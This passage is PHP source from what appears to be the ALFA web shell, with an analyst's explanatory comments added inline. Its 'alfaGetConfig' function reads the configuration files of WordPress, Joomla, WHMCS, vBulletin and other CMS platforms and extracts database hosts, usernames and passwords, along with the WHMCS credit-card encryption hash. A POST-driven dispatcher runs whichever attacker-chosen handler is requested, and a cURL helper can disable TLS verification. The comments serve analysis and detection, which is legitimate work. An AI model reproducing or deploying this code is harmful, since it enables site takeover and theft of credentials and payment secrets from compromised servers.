  6160. if(!$this->curl_status){return false;}
  6161. $process = curl_init($url);
  6162. curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
  6163. curl_setopt($process, CURLOPT_HEADER, 0);
  6164. curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
  6165. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  6166. curl_setopt($process, CURLOPT_ENCODING , $this->compression);
  6167. curl_setopt($process, CURLOPT_TIMEOUT, 30);
        // With $ssl set, neither the certificate chain nor the host name is verified.
  6168. if($this->ssl){
  6169. curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
  6170. curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
  6171. }
  6172. if($this->cookies){
  6173. curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
  6174. curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
  6175. }
  6176. if($this->proxy){
  6177. curl_setopt($process, CURLOPT_PROXY, $this->proxy);
  6178. }
  6179. if($method=='post'){
  6180. curl_setopt($process, CURLOPT_POSTFIELDS, $data);
  6181. curl_setopt($process, CURLOPT_POST, 1);
        // Replaces the header list set above with a single Content-Type header for the POST.
  6182. curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
  6183. }
  6184. $return = curl_exec($process);
  6185. curl_close($process);
  6186. return $return;
  6187. }
  6188. function error($error) {
        // Prints an HTML error box containing $error and terminates the script.
  6189. echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
  6190. die;
  6191. }
  6192. }
  6193. function getConfigHtml($cms){
        // Analyst note: builds and returns the HTML form of the "GetConfig" panel: a CMS selector
        // (with $cms pre-selected) and a path field pre-filled with $_SERVER['DOCUMENT_ROOT'].
        // Submitting it calls the shell's g('GetConfig', ...) dispatcher. Nothing is echoed here.
  6194. $content = '';
        // Keys are the identifiers sent to the GetConfig handler; values are display labels.
  6195. $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
  6196. $content .= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
  6197. foreach($cms_array as $key => $val){
  6198. $content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
  6199. }
  6200. $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
  6201. $content .= "</form>";
  6202. return $content;
  6203. }
  6204. function alfaGetConfig(){
  6205. $cms = $_POST['alfa1'];
  6206. $path = trim($_POST['alfa2']);
  6207. $config = array(
  6208. 'wp'=>array('file'=>'/wp-config.php',
  6209. 'host'=>array("/define\('DB_HOST',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6210. 'dbname'=>array("/define\('DB_NAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6211. 'dbuser'=>array("/define\('DB_USER',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6212. 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6213. 'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6214. ),
  6215. 'drupal'=>array('file'=>'/config.php',
  6216. 'host'=>array("/define\('DB_HOSTNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6217. 'dbname'=>array("/define\('DB_DATABASE',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6218. 'dbuser'=>array("/define\('DB_USERNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6219. 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6220. 'prefix'=>array("/define\('DB_PREFIX',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2)
  6221. ),
  6222. 'vb'=>array('file'=>'/includes/config.php',
  6223. 'host'=>array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6224. 'dbuser'=>array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6225. 'dbname'=>array("/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6226. 'dbpw'=>array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6227. 'prefix'=>array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6228. ),
  6229. 'phpnuke'=>array('file'=>'/config.php',
  6230. 'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6231. 'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6232. 'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6233. 'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6234. 'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
  6235. ),
  6236. 'smf'=>array('file'=>'/Settings.php',
  6237. 'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6238. 'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6239. 'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6240. 'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6241. 'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6242. ),
  6243. 'whmcs'=>array('file'=>'/configuration.php',
  6244. 'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6245. 'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6246. 'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6247. 'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6248. 'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6249. ),
  6250. 'joomla'=>array('file'=>'/configuration.php',
  6251. 'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6252. 'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6253. 'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6254. 'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6255. 'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6256. ),
  6257. 'phpbb'=>array('file'=>'/config.php',
  6258. 'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6259. 'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6260. 'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6261. 'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6262. 'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6263. ),
  6264. 'mybb'=>array('file'=>'/inc/config.php',
  6265. 'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6266. 'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6267. 'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6268. 'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6269. 'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6270. )
  6271. );
  6272. $data = array();
  6273. $srch_host = $config[$cms]['host'][0];
  6274. $srch_user = $config[$cms]['dbuser'][0];
  6275. $srch_name = $config[$cms]['dbname'][0];
  6276. $srch_pw = $config[$cms]['dbpw'][0];
  6277. $prefix = $config[$cms]['prefix'][0];
  6278. $file = $config[$cms]['file'];
  6279. $chost = $config[$cms]['host'][1];
  6280. $cuser = $config[$cms]['dbuser'][1];
  6281. $cname = $config[$cms]['dbname'][1];
  6282. $cpw = $config[$cms]['dbpw'][1];
  6283. $cprefix = $config[$cms]['prefix'][1];
  6284. if(@is_dir($path)||_alfa_is_dir($path)){
  6285. $file=$path.$file;
  6286. }elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
  6287. $file=$path;
  6288. }else{
  6289. return false;
  6290. }
  6291. $file = __read_file($file);
  6292. if(preg_match($srch_host, $file, $mach)){
  6293. $data['host'] = $mach[$chost];
  6294. }
  6295. if(preg_match($srch_user, $file, $mach)){
  6296. $data['user'] = $mach[$cuser];
  6297. }
  6298. if(preg_match($srch_name, $file, $mach)){
  6299. $data['dbname'] = $mach[$cname];
  6300. }
  6301. if(preg_match($srch_pw, $file, $mach)){
  6302. $data['password'] = $mach[$cpw];
  6303. }
  6304. if(isset($prefix)){
  6305. if(preg_match($prefix, $file, $mach)){
  6306. $data['prefix'] = $mach[$cprefix];
  6307. }
  6308. }
  6309. if($cms=='whmcs'){
  6310. if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
  6311. $data['cc_encryption_hash'] = $mach[3];
  6312. }
  6313. }
  6314. echo json_encode($data);
  6315. }
  // Request dispatcher: top-level code that selects and runs one handler, then ends the script.
  // The POST field 'a' names the action; the function invoked is 'alfa' . $_POST['a'].
  // The fixed 'alfa' prefix plus the function_exists() check mean that only functions
  // whose names begin with 'alfa' are reachable through this path.
  // NOTE(review): no access check is visible in these lines; whether one ran earlier in
  // the file cannot be told from here.
  // Detection note: a request-controlled name concatenated into call_user_func() is a
  // stable static indicator for file scanners, and POST bodies carrying an 'a' field
  // are the matching signal in request logs.
  6316. if(empty($_POST['a']))
  // No action supplied: use $default_action when it is set and maps to an existing 'alfa*' function.
  6317. if(isset($default_action) && function_exists('alfa' . $default_action))
  6318. $_POST['a'] = $default_action;
  // This else pairs with the inner if (nearest unmatched if), so 'FilesMan' is the
  // fallback only when no action was supplied and $default_action was unusable.
  6319. else
  6320. $_POST['a'] = 'FilesMan';
  // Call the handler only if a function with the composed name is defined; an unknown
  // action name falls through without calling anything.
  6321. if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
  6322. call_user_func('alfa' . $_POST['a']);
  // Unconditional stop: nothing after this point in the file is executed.
  6323. exit;
  6324. /*
  6325. #Persian Gulf For Ever
  6326. #skype : sole.sad
  6327. #skype : ehsan.invisible
  6328. */
  6329. ?>